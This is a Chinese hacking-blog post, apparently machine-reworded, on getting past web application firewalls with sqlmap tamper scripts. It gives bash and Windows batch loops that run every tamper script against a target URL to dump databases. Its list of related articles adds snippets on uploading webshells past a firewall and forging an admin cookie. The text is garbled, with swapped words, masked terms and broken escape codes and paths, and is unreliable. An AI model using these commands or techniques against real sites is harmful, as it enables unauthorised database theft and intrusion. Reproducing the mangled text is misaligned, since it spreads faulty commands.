有那么多tamper脚本 *** ,Linux时该怎么才能找到合适

hacker5年前黑客文章754

很多状况下我们可以根据应用sqlmap中的tamper脚本 *** 来对总体目标开展更高效率的进攻。tamper脚本 *** 的功效是改动大家传出的恳求来避免其被WAF( *** 技术应用服务器防火墙)阻拦。在一些状况你将会必须把一些脚本 *** 合拼到一起才可以过WAF。

 

脚本 *** 的详细目录详细地址在sqlmap/tamper。

操作 *** 是加主要参数--tamper name.py--tamper name1.py,name2.py,name3.py……

 

简易使用 *** 实例:

c:\Python27\sqlmap>sqlmap.py -u "http://www.***.com/news/html/index.php?id=829" -v 3 --dbs --batch --tamper "space1morehash.py"

 

上边仅仅单一的用“--tamper ”这一主要参数来绕开WAF,下列再给大伙儿详尽的解读解读有关sqlmap绕WAF的难题,实际请向下看:

 

1、linux下sqlmap/tamper脚本 *** 部位:

linux下tamper脚本制作部位

 

2、win下sqlmap/tamper脚本 *** 部位:

win下sqlmap/tamper脚本制作部位

 

根据图中能够看得出:有那么多tamper脚本 *** ,Linux时该怎么才能找到合适的?

一个一个来试是不是太累了太费力,并且对一些新手而言没办法记牢每一个tamper脚本 *** 实际是干什么用的?吐司的lostwolf写了一个sh指令,能够在kali下立即先后应用每一个tamper脚本 *** ,进而寻找适合的。

该shell句子是:

for t in `ls /usr/share/sqlmap/tamper/*.py`; do echo -e "e[41;10m tamper: $te[b250"; sqlmap -u "http://192.168.1.100/sql.asp?id=1" --dbs --random-agent -- *** art --batch --tamper $t --threads 10;done;

結果以下:

应用每一个tamper脚本制作,进而寻找适合的

sh句子简易表明:

--random-agent主要参数任意;random-agent 任意agent头 ;

-- *** art 智能手机的 *** ;

--batch 默认设置挑选接受键入;

echo -e "e[41;10m tamper: $te[b250"; 是以便红底白字显示信息当今应用的tamper脚本 *** 。

 

假如在windows下又怎么办呢?

我写了一个批处理命令,指令以下(sqlmap相对路径部位自主变更):

for /f "delims=" %%i in ('dir /b D:sqlmap	amper*.py') do d:sqlmapsqlmap.py -u "http://192.168.1.100/sql.asp?id=1" --dbs --random-agent -- *** art --batch --tamper %%i --threads 10

sqlmap批处理命令windos

自然这一方式也是有缺陷的,会十分粗鲁地启用每一个tamper脚本 *** 来试一次,而且不容易组成脚本 *** 来检测了,因此大伙儿假如能掌握每一个tamper脚本 *** 功效,精确的启用,会省劲省时许多。

 

留意:无论之后干什么?绕开WAF更好是的方式便是“编号”,实际能够看一下:中国蚁剑免费下载、安裝、使用 *** ,它里边刻意讲来到用伺服电机数据加密绕开WAF的难题。

标签: 黑客技术

相关文章

FCK突破建立文件夹后台拿shell

FCK突破建立文件夹后台拿shell

  今天准备搞一个站,在此站搞了一翻后发现此站没有找到可利用的漏洞,此时就有点感觉蛋疼了,所以就想找个旁站来提权,扫描了一下旁站 我靠没有几个站点,后来在经过一翻努力下,终于还是登录进了一个...

挖洞经验 | 从Youtube的视频ID和频道ID中发现漏洞

挖洞经验 | 从Youtube的视频ID和频道ID中发现漏洞

大家好,今天分享这篇Writeup是关于Youtube的两个漏洞,确切来说,是Youtube Studio平台(https://studio.youtube.com/)漏洞。作者通过其中涉及的视频...

详解测试IP地址的几个命令

如果你是一位网络管理员或者是一位普通的拨号用户,可能经常会遇到这样一种情形,那就是访问某一个网站时可能会花费好长时间,或者根本就无法访问需要的网站,这样我们许多宝贵的时间就消耗在等待上了。那我们有没有...

绕过安全狗拦截拿webshell

将大马写到一个txt文件里面,命名为chnlanker.txt 再建一个文本文档,asp的就写入: <!–#include file=”chncto.txt”–>保存为x.asp...

超级简单的入侵网站教程

关键字:inurl:szwyadmin/login.asp 首先,把下面的代码输入网址 代码:javascript:alert(document.cookie="adminuser="...

五招查出想要知道的IP地址

与好友在网络上相互传输资料时,有时先要知道对方计算机的IP地址,才能与对方建立信息传输通道。 那么对方的IP地址该如何搜查得到呢?这样的问题你也许会嗤之以鼻,的确,查询对方计算机的IP地址,实在简单...